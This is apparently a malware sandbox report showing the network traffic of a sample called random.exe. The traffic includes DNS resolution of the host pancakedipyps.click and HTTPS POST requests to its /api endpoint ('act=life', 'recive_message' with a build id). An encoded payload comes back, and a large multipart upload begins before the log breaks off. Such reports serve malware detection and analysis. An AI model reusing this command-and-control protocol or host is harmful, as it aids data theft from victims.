                                      Jan 8, 2025 11:47:03.905587912 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.905597925 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.905864954 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.907150030 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.907320023 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.907356024 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:03.907427073 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:03.907437086 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:04.546026945 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:04.546144009 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:04.546197891 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:04.546375036 CET49742443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:04.546386003 CET44349742188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:04.671930075 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:04.671953917 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:04.672025919 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:04.672364950 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:04.672379971 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.130980015 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.131057978 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.132420063 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.132427931 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.132690907 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.134104013 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.134237051 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.134241104 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.600128889 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.600213051 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.600270033 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.600485086 CET49744443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.600495100 CET44349744188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.888276100 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.888307095 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:05.888390064 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.888765097 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:05.888777971 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.348023891 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.348119020 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.349468946 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.349478960 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.349720955 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.351061106 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.351819038 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.351855993 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.351986885 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352047920 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.352174997 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352215052 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.352368116 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352394104 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.352560043 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352590084 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.352746964 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352786064 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.352794886 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.352993965 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.353027105 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362267971 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.362437963 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362482071 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.362482071 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362499952 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.362509012 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362550020 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.362617970 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362667084 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.362698078 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.367368937 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:06.367461920 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:06.367479086 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:09.938153028 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:09.938327074 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:09.938388109 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:09.938466072 CET49746443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:09.938486099 CET44349746188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:09.943063974 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:09.943105936 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:09.943186045 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:09.943487883 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:09.943501949 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.415599108 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.415668964 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.417073011 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.417083025 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.417325974 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.418720961 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.418740034 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.418797970 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.911024094 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.911118984 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.911195993 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.911396027 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.911415100 CET44349749188.114.97.3192.168.2.4
                                      Jan 8, 2025 11:47:10.911425114 CET49749443192.168.2.4188.114.97.3
                                      Jan 8, 2025 11:47:10.911429882 CET44349749188.114.97.3192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 8, 2025 11:46:57.113786936 CET5800553192.168.2.41.1.1.1
                                      Jan 8, 2025 11:46:57.128448009 CET53580051.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 8, 2025 11:46:57.113786936 CET192.168.2.41.1.1.10x6c3aStandard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 8, 2025 11:46:57.128448009 CET1.1.1.1192.168.2.40x6c3aNo error (0)pancakedipyps.click188.114.97.3A (IP address)IN (0x0001)false
                                      Jan 8, 2025 11:46:57.128448009 CET1.1.1.1192.168.2.40x6c3aNo error (0)pancakedipyps.click188.114.96.3A (IP address)IN (0x0001)false
                                      • pancakedipyps.click
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449731188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:46:57 UTC266OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8
                                      Host: pancakedipyps.click
                                      2025-01-08 10:46:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                      Data Ascii: act=life
                                      2025-01-08 10:46:58 UTC1127INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:46:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=5fi0jkh2fcbt18c29heokdngmk; expires=Sun, 04 May 2025 04:33:37 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0m%2Fw%2B7oVsiZeJ1asc6oPMtGMkkMp23HkWE3yn5cKyDdgcGS2ivQ%2BtR0N8kYnBdJX8zmZ7iQjTmp5v5Iz2XxcWie55RpoOUtjZUwK6tiDgH%2BOw9DmO9vPuAQjP4fzAq5IZNgB79fh"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b536d6943bb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1565&rtt_var=595&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1825000&cwnd=228&unsent_bytes=0&cid=d5516da2620a954d&ts=581&x=0"
                                      2025-01-08 10:46:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                      Data Ascii: 2ok
                                      2025-01-08 10:46:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449733188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:46:58 UTC267OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 46
                                      Host: pancakedipyps.click
                                      2025-01-08 10:46:58 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                      Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                      2025-01-08 10:46:59 UTC1127INHTTP/1.1 200 OK
                                      Date: Wed, 08 Jan 2025 10:46:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=jrhdt0udvlq7htt2a7t6dq89jo; expires=Sun, 04 May 2025 04:33:38 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zpf4GDwKLyNRLhQmLJGlbK67Vu%2F2iMs6o5I43vLLxESn9xmM4S9ohAeCl1LGyd%2FNTxswjBLdAJVuxIRo%2BBjjgZpPKBoWyVaOJhsmXgDHezgAyBxY1cjwDEGRDnCb4kCLU%2FAY1wym"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8feb9b599aa85e73-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1685&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1611479&cwnd=201&unsent_bytes=0&cid=e49de2340ffd6c2c&ts=486&x=0"
                                      2025-01-08 10:46:59 UTC242INData Raw: 31 63 39 61 0d 0a 54 30 66 67 4e 6b 6f 65 4b 73 54 33 41 74 6d 6e 65 5a 77 35 33 49 31 67 50 34 39 6e 69 53 57 44 6d 36 70 53 73 50 2b 6e 48 30 55 30 5a 5a 59 55 63 43 6f 47 35 6f 52 6e 2b 35 30 4e 37 6b 79 35 6f 55 4a 65 36 30 57 7a 51 2b 4c 33 32 54 65 63 33 64 46 79 5a 33 55 68 67 56 6f 35 65 77 62 6d 6b 6e 72 37 6e 53 4c 6e 47 37 6e 6a 51 67 57 74 41 75 4e 48 34 76 66 49 4d 39 75 51 31 33 4d 6d 4a 79 75 48 58 69 39 39 54 71 57 62 62 37 7a 43 48 50 31 54 73 75 51 4e 56 2b 4a 46 70 51 66 6d 34 59 68 6f 6b 72 4c 43 61 79 51 43 4a 70 4e 64 61 47 4d 47 76 39 56 6e 74 34 56 44 76 6c 69 35 37 77 78 5a 36 77 7a 68 54 65 76 2f 79 54 62 61 6a 38 35 35 4c 53 63 6c 68 46 38 6c 64 46 71 6f 6b 57 69 33 78 42 62 39 47 2f 43 76
                                      Data Ascii: 1c9aT0fgNkoeKsT3AtmneZw53I1gP49niSWDm6pSsP+nH0U0ZZYUcCoG5oRn+50N7ky5oUJe60WzQ+L32Tec3dFyZ3UhgVo5ewbmknr7nSLnG7njQgWtAuNH4vfIM9uQ13MmJyuHXi99TqWbb7zCHP1TsuQNV+JFpQfm4YhokrLCayQCJpNdaGMGv9Vnt4VDvli57wxZ6wzhTev/yTbaj855LSclhF8ldFqokWi3xBb9G/Cv
                                      2025-01-08 10:46:59 UTC1369INData Raw: 42 55 57 74 58 61 73 55 30 2f 72 5a 49 63 65 51 31 58 74 6e 4d 6d 75 62 46 43 39 77 43 50 37 56 61 4c 66 4c 48 76 31 55 75 65 34 43 54 2b 49 46 36 45 2f 70 2f 63 49 2f 33 5a 4c 4c 64 79 41 6c 4c 49 56 62 4c 33 52 4f 71 5a 59 67 39 59 55 63 35 68 76 6d 72 79 4a 4e 37 67 62 2f 53 76 43 35 31 33 37 4c 33 63 4a 78 5a 33 56 6c 68 46 6f 70 63 55 69 30 6e 57 75 77 77 41 6e 31 55 72 50 69 41 6c 44 6e 43 75 68 48 35 76 50 43 50 39 69 5a 79 48 41 68 4c 53 58 43 47 6d 68 37 55 4f 62 4e 49 4a 6a 41 43 2f 6c 58 71 4b 30 34 48 66 4a 4c 38 67 66 6d 39 59 68 6f 6b 70 58 41 66 69 51 6d 4b 6f 46 63 49 32 35 49 74 4a 4e 74 76 74 63 64 2b 31 57 30 37 42 42 58 34 77 50 6f 54 75 72 77 7a 54 66 57 33 59 73 39 49 44 56 6c 32 68 51 4a 63 55 4f 71 6e 33 65 37 68 51 53 77 51 76 37
                                      Data Ascii: BUWtXasU0/rZIceQ1XtnMmubFC9wCP7VaLfLHv1Uue4CT+IF6E/p/cI/3ZLLdyAlLIVbL3ROqZYg9YUc5hvmryJN7gb/SvC5137L3cJxZ3VlhFopcUi0nWuwwAn1UrPiAlDnCuhH5vPCP9iZyHAhLSXCGmh7UObNIJjAC/lXqK04HfJL8gfm9YhokpXAfiQmKoFcI25ItJNtvtcd+1W07BBX4wPoTurwzTfW3Ys9IDVl2hQJcUOqn3e7hQSwQv7
                                      2025-01-08 10:46:59 UTC1369INData Raw: 77 50 6b 53 75 32 35 68 6e 44 56 68 59 55 6c 5a 77 63 6d 6c 6c 63 69 50 6e 32 6c 6d 32 36 38 30 31 76 68 46 61 65 76 42 56 47 74 58 61 74 4b 34 50 48 4f 49 74 32 51 78 6e 4d 70 49 69 43 4e 58 43 68 38 52 61 4f 52 61 37 44 47 46 76 70 4a 74 4f 38 4b 57 4f 77 50 34 51 65 76 75 63 38 6f 6b 73 57 46 54 44 41 6d 5a 37 64 58 4a 6e 4a 50 73 4e 56 2f 39 64 78 62 2b 56 66 2b 74 30 4a 51 35 51 44 75 53 4f 44 7a 78 6a 58 59 6b 63 31 7a 4a 44 38 71 68 6c 51 6b 64 45 4b 72 6d 32 53 7a 7a 42 44 31 58 62 37 75 43 42 32 6a 52 65 78 66 6f 61 47 49 42 4e 57 52 79 48 4a 6c 47 43 61 4d 57 69 39 71 43 4c 6e 62 65 66 76 43 46 37 34 44 2f 75 4d 4c 58 65 59 50 37 30 66 6d 39 4d 30 7a 31 5a 37 49 65 69 30 6a 49 6f 5a 59 49 58 46 4f 70 70 4a 6b 76 74 63 65 39 31 65 79 72 30 77 64
                                      Data Ascii: wPkSu25hnDVhYUlZwcmllciPn2lm26801vhFaevBVGtXatK4PHOIt2QxnMpIiCNXCh8RaORa7DGFvpJtO8KWOwP4Qevuc8oksWFTDAmZ7dXJnJPsNV/9dxb+Vf+t0JQ5QDuSODzxjXYkc1zJD8qhlQkdEKrm2SzzBD1Xb7uCB2jRexfoaGIBNWRyHJlGCaMWi9qCLnbefvCF74D/uMLXeYP70fm9M0z1Z7Iei0jIoZYIXFOppJkvtce91eyr0wd
                                      2025-01-08 10:46:59 UTC1369INData Raw: 6e 34 75 63 38 38 6b 73 57 46 64 43 34 2f 4b 34 78 64 4a 58 70 41 6f 5a 74 74 73 4d 4d 51 2b 56 79 34 34 67 70 51 36 41 62 71 51 2b 76 72 79 7a 76 59 6b 4d 38 39 61 57 30 69 6d 68 52 77 50 47 2b 71 76 48 43 67 31 77 32 2b 52 50 44 32 51 6c 72 68 52 62 4d 48 34 76 62 42 50 39 71 56 79 6e 49 6a 49 79 4f 45 57 53 31 7a 51 72 53 64 62 72 62 4f 46 50 56 4a 76 75 49 47 55 65 6b 4e 34 45 32 68 74 34 67 33 79 74 32 64 50 52 49 67 4b 6f 4a 58 50 6a 78 58 36 49 77 67 76 4d 6c 62 70 68 75 79 34 51 4a 53 34 51 6e 67 54 2b 44 31 78 6a 66 58 6c 4d 31 31 4e 53 77 68 69 6c 55 6d 63 30 6d 69 6b 47 57 2f 77 68 2f 34 56 50 36 68 51 6c 72 31 52 62 4d 48 7a 74 37 39 63 76 4f 6e 68 57 4a 70 4e 47 57 46 57 47 67 6b 43 4b 71 57 62 4c 50 4b 48 66 64 58 74 4f 59 4a 55 65 59 42 35
                                      Data Ascii: n4uc88ksWFdC4/K4xdJXpAoZttsMMQ+Vy44gpQ6AbqQ+vryzvYkM89aW0imhRwPG+qvHCg1w2+RPD2QlrhRbMH4vbBP9qVynIjIyOEWS1zQrSdbrbOFPVJvuIGUekN4E2ht4g3yt2dPRIgKoJXPjxX6IwgvMlbphuy4QJS4QngT+D1xjfXlM11NSwhilUmc0mikGW/wh/4VP6hQlr1RbMHzt79cvOnhWJpNGWFWGgkCKqWbLPKHfdXtOYJUeYB5
                                      2025-01-08 10:46:59 UTC1369INData Raw: 48 4d 64 4f 62 31 33 6f 75 50 79 75 50 57 79 42 30 51 61 65 52 5a 62 62 44 46 2f 52 61 75 65 45 4d 56 61 31 4c 71 30 44 35 75 5a 42 77 38 34 33 65 62 7a 45 67 42 49 39 62 61 47 4d 47 76 39 56 6e 74 34 56 44 76 6c 4b 73 36 77 39 50 35 41 4c 6c 53 4f 4c 72 79 54 33 5a 6a 38 4a 79 49 79 6f 70 68 46 73 75 66 55 32 73 6d 57 65 2b 7a 68 54 79 47 2f 43 76 42 55 57 74 58 61 74 70 36 75 72 66 4d 39 79 57 30 32 5a 6e 4d 6d 75 62 46 43 39 77 43 50 37 56 59 37 44 4f 48 2f 35 58 76 75 73 50 58 66 38 4b 37 45 44 6f 38 74 6f 36 31 5a 72 4f 64 53 77 69 49 35 42 59 4a 6d 35 4e 74 49 63 67 39 59 55 63 35 68 76 6d 72 7a 52 61 2f 52 58 6f 42 64 44 76 79 79 62 5a 6b 4d 6b 39 4f 47 4d 38 77 6c 4d 6b 50 42 44 6d 6b 32 2b 79 78 68 54 2f 55 72 4c 69 42 31 54 6f 42 4f 31 44 36 2f
                                      Data Ascii: HMdOb13ouPyuPWyB0QaeRZbbDF/RaueEMVa1Lq0D5uZBw843ebzEgBI9baGMGv9Vnt4VDvlKs6w9P5ALlSOLryT3Zj8JyIyophFsufU2smWe+zhTyG/CvBUWtXatp6urfM9yW02ZnMmubFC9wCP7VY7DOH/5XvusPXf8K7EDo8to61ZrOdSwiI5BYJm5NtIcg9YUc5hvmrzRa/RXoBdDvyybZkMk9OGM8wlMkPBDmk2+yxhT/UrLiB1ToBO1D6/
                                      2025-01-08 10:46:59 UTC1369INData Raw: 33 64 6f 7a 50 6d 30 69 6a 68 52 77 50 45 75 68 6c 6d 47 78 7a 42 66 78 58 4c 72 39 43 46 72 2f 42 4f 70 4d 37 50 58 49 50 64 2b 58 78 48 51 71 49 53 69 46 55 79 64 35 43 4f 6a 56 5a 36 4f 46 51 37 35 36 73 2b 51 4f 42 72 64 46 39 41 6e 34 75 63 38 38 6b 73 57 46 66 53 30 6f 4c 34 39 58 4a 33 39 61 70 35 4e 79 75 38 67 52 37 46 47 31 36 67 39 51 34 41 62 74 51 65 72 31 32 6a 6e 53 6e 73 34 39 61 57 30 69 6d 68 52 77 50 47 75 78 67 32 71 38 79 51 33 31 57 72 33 35 44 30 32 74 53 36 74 57 35 75 69 49 61 4d 53 4e 30 6e 6f 34 59 7a 7a 43 55 79 51 38 45 4f 61 54 61 62 33 43 48 66 42 4a 75 2b 6b 4e 55 75 51 4d 37 30 2f 69 2b 63 77 30 31 5a 6a 47 63 53 77 71 4a 6f 31 51 49 58 4a 42 71 64 55 75 2b 38 49 44 76 67 50 2b 7a 68 6c 65 34 51 69 72 57 4b 2f 67 69 44 66
                                      Data Ascii: 3dozPm0ijhRwPEuhlmGxzBfxXLr9CFr/BOpM7PXIPd+XxHQqISiFUyd5COjVZ6OFQ756s+QOBrdF9An4uc88ksWFfS0oL49XJ39ap5Nyu8gR7FG16g9Q4AbtQer12jnSns49aW0imhRwPGuxg2q8yQ31Wr35D02tS6tW5uiIaMSN0no4YzzCUyQ8EOaTab3CHfBJu+kNUuQM70/i+cw01ZjGcSwqJo1QIXJBqdUu+8IDvgP+zhle4QirWK/giDf
                                      2025-01-08 10:46:59 UTC243INData Raw: 57 64 31 5a 61 4a 66 50 6e 6c 50 73 4e 64 56 75 4d 73 56 2b 55 33 2b 38 44 30 54 72 51 72 78 42 37 6e 41 30 58 44 56 6b 59 55 6c 5a 7a 67 69 67 6c 4d 79 61 6b 2b 71 68 47 75 32 79 54 6e 78 58 4b 6a 73 44 56 37 38 44 4b 64 4d 37 4c 6d 47 63 4e 57 46 68 53 56 6e 41 69 4b 55 56 77 64 2f 57 61 2f 56 4c 76 76 43 44 62 34 44 2f 74 46 43 54 2b 34 56 36 45 6a 77 78 34 68 6f 79 36 4f 46 64 6a 45 71 4e 59 46 43 49 33 46 45 74 36 73 67 34 35 46 4a 72 41 6e 73 76 52 30 64 38 6a 71 6c 42 2b 43 35 6b 41 6e 4c 33 64 4d 39 66 33 39 72 77 6b 5a 6f 4a 41 6a 68 6c 6e 4b 70 77 78 6a 6f 57 50 6e 52 50 48 72 37 44 2b 78 58 35 75 37 48 63 4a 7a 64 79 6a 31 2f 46 47 57 4c 55 7a 4e 74 58 71 75 46 5a 2f 76 36 56 62 35 44 2f 72 64 43 61 4f 0d 0a
                                      Data Ascii: Wd1ZaJfPnlPsNdVuMsV+U3+8D0TrQrxB7nA0XDVkYUlZzgiglMyak+qhGu2yTnxXKjsDV78DKdM7LmGcNWFhSVnAiKUVwd/Wa/VLvvCDb4D/tFCT+4V6Ejwx4hoy6OFdjEqNYFCI3FEt6sg45FJrAnsvR0d8jqlB+C5kAnL3dM9f39rwkZoJAjhlnKpwxjoWPnRPHr7D+xX5u7HcJzdyj1/FGWLUzNtXquFZ/v6Vb5D/rdCaO
                                      2025-01-08 10:46:59 UTC1369INData Raw: 32 63 66 61 0d 0a 34 4c 35 55 44 33 36 49 55 58 78 4a 66 43 62 53 41 36 4b 73 49 61 61 48 6f 49 2f 73 59 75 2b 38 45 4b 76 67 50 75 76 56 6b 49 76 6c 4b 37 46 66 36 33 30 58 44 45 33 5a 30 76 61 57 30 33 77 67 78 6f 4f 30 75 30 68 32 61 34 30 78 69 35 5a 59 44 49 47 46 44 72 45 76 70 35 33 2f 37 53 50 64 53 4b 31 44 45 79 4c 69 75 4d 55 7a 34 38 42 75 61 61 49 4f 50 38 57 37 59 62 67 61 46 43 52 61 31 64 71 33 4c 69 39 38 59 33 78 49 79 49 57 6a 30 67 49 35 56 46 61 44 49 49 6f 4e 55 34 36 59 74 62 2b 6b 72 2b 74 31 49 50 74 6c 43 34 45 4c 47 72 31 33 37 4c 33 64 4d 39 66 33 39 72 77 6b 5a 6f 4a 41 6a 68 6c 6e 4b 70 77 78 6a 6f 57 50 6e 52 50 48 50 71 41 2b 35 41 38 62 76 6d 4f 38 61 61 68 54 4e 6e 49 6d 58 61 62 57 67 30 43 4a 6e 62 49 4b 4f 46 51 37 35
                                      Data Ascii: 2cfa4L5UD36IUXxJfCbSA6KsIaaHoI/sYu+8EKvgPuvVkIvlK7Ff630XDE3Z0vaW03wgxoO0u0h2a40xi5ZYDIGFDrEvp53/7SPdSK1DEyLiuMUz48BuaaIOP8W7YbgaFCRa1dq3Li98Y3xIyIWj0gI5VFaDIIoNU46Ytb+kr+t1IPtlC4ELGr137L3dM9f39rwkZoJAjhlnKpwxjoWPnRPHPqA+5A8bvmO8aahTNnImXabWg0CJnbIKOFQ75
                                      2025-01-08 10:46:59 UTC1369INData Raw: 51 32 2f 47 71 56 65 6f 65 2b 49 61 49 44 54 68 57 39 6e 64 57 58 46 56 7a 70 75 54 71 57 44 59 2f 7a 37 4a 64 6c 56 75 65 34 55 54 66 6f 4b 31 58 6e 30 2b 73 59 2b 31 59 76 55 50 57 6c 74 4b 73 49 4d 45 54 77 41 35 71 6f 75 2b 39 31 62 70 68 75 4c 37 41 78 54 36 68 50 36 43 73 62 33 7a 7a 48 45 6a 64 4a 79 5a 32 4e 6c 68 42 52 77 4c 67 62 6d 6b 58 48 37 6e 55 75 73 41 4f 75 38 56 51 32 2f 47 71 56 65 6f 65 2b 49 61 49 44 54 68 57 39 6e 64 57 58 46 56 7a 70 75 54 71 57 44 59 2f 7a 37 4a 64 6c 56 75 65 34 55 54 66 6f 4b 70 47 6e 58 32 50 59 4f 78 35 37 4c 63 79 41 37 4e 4d 49 61 61 48 4d 49 2f 71 77 67 38 34 55 6b 73 42 75 6d 72 31 6f 64 32 41 62 6c 53 65 62 76 32 58 33 31 6b 38 4a 38 4d 54 30 79 6a 52 73 47 53 6d 6e 6d 32 79 43 39 68 55 4f 73 46 66 37 72
                                      Data Ascii: Q2/GqVeoe+IaIDThW9ndWXFVzpuTqWDY/z7JdlVue4UTfoK1Xn0+sY+1YvUPWltKsIMETwA5qou+91bphuL7AxT6hP6Csb3zzHEjdJyZ2NlhBRwLgbmkXH7nUusAOu8VQ2/GqVeoe+IaIDThW9ndWXFVzpuTqWDY/z7JdlVue4UTfoKpGnX2PYOx57LcyA7NMIaaHMI/qwg84UksBumr1od2AblSebv2X31k8J8MT0yjRsGSmnm2yC9hUOsFf7r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449736188.114.97.34436940C:\Users\user\Desktop\random.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-08 10:46:59 UTC281OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=83PVIUVIGUHSL4
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 18138
                                      Host: pancakedipyps.click
